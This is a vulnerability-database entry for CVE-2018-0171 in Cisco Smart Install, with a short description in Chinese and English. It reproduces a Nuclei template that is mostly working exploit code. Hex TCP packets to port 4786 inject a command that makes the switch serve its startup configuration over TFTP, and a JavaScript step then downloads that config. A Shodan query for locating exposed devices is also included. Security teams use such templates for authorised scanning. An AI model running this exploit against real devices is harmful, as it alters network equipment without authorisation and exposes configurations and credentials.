CVE-2018-0171: Cisco Smart Install - Configuration Download

日期: 2025-08-01 | 影响软件: Cisco Smart Install | POC: 已公开

漏洞描述

Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.

PoC代码[已公开]

id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha
  severity: critical
  description: |
    Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    epss-score: 0.93123
    epss-percentile: 0.99783
    cwe-id: CWE-20
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev

flow: tcp(1) && javascript(1)

tcp:
  - inputs:
      - data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
        type: hex
      - data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        type: hex

    host:
      - "{{Hostname}}"
    port: 4786

    matchers:
      - type: word
        part: raw
        words:
          - ""
        internal: true

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = "\x00\x01startup-config\x00octet\x00";
      packet.WriteString(message);

      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      let resp = conn.RecvString(4096);
      resp;

    args:
      Host: "{{Host}}"
      Port: 69

    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'hostname'
        condition: and
# digest: 4a0a0047304502203b9f36f67fe77d979e5f83262016b887717ba3404e6c3e67136fecd452315e54022100a84b6e2adf17fb6f1a7097b9f80a5e185e6d35b946af1f2949beb3fca9005464:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2018/CVE-2018-0171.yaml

相关漏洞推荐